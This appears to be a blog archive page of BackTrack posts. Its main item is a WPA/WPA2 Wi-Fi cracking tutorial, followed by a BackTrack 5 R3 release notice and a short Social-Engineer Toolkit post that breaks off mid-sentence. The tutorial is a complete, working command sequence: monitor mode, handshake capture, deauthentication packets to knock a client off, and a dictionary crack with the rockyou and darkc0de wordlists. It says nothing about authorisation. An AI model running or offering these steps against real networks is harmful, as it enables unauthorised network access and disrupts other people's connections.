Archive | BackTrack RSS feed for this section

Wireless WPA and WPA2 Cracking Tutorial

Terminal Commands for WPA/WPA2 wireless cracking:

airmon-ng start wlan0
airodump-ng mon0

Press Ctrl+Z to break out of ‘airodump-ng’ after you collect the wireless access point’s BSSID and CH #.

airmon-ng stop mon0
airmon-ng start wlan0 10
airodump-ng -c 10 --bssid 00:11:50:61:18:72 -w wpadeauth-01.cap mon0

Wait and collect the WPA/WPA2 handshake when a device with the known key connects to the wireless network. Or if someone is already on the network you can “sends disassocate packets to one or more clients which are currently associated with a particular access point.”[1]

aireplay-ng -0 3 -a 00:11:50:61:18:72 -c 58:55:CA:96:EE:84 mon0

Now that you have the WPA/WPA2 handshake, let’s crack it!

gunzip darkc0de.lst.gz
aircrack-ng -w darkc0de.lst -b 00:11:50:61:18:72 wpadeauth-01.cap
7z x rockyou.7z


Recommended cards for wireless injection with BackTrack and/or Kali:

  • Alfa AWUS036H (Highly recommended and has better range)
  • Alfa AWUS036NHA (Also great, less range but faster wifi connection)

[*] darkc0de.lst.gz
[*] rockyou.7z

BackTrack 5 R3 Released


Officially released at the BlackHat USA 2012, BackTrack 5 R3 has been finally released to the masses; there’s KDE and GNOME, 32/64 bit ISOs, along with a single VMware Image (Gnome, 32 bit). As the release notes, “for those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.”


Leave a Comment

Social Engineering Toolkit (SET) in Graphical Web

The web interface for the Social-Engineer Toolkit takes whatever you select and generates an answer file that is ultimately placed into set-automate. Each response assigns a given value and the built in intelligence on the back-end parses your responses into building and crafting the attack into SET.

Download Social Engineer Toolkit 3.6:

svn co set/

To turn the web interface simply type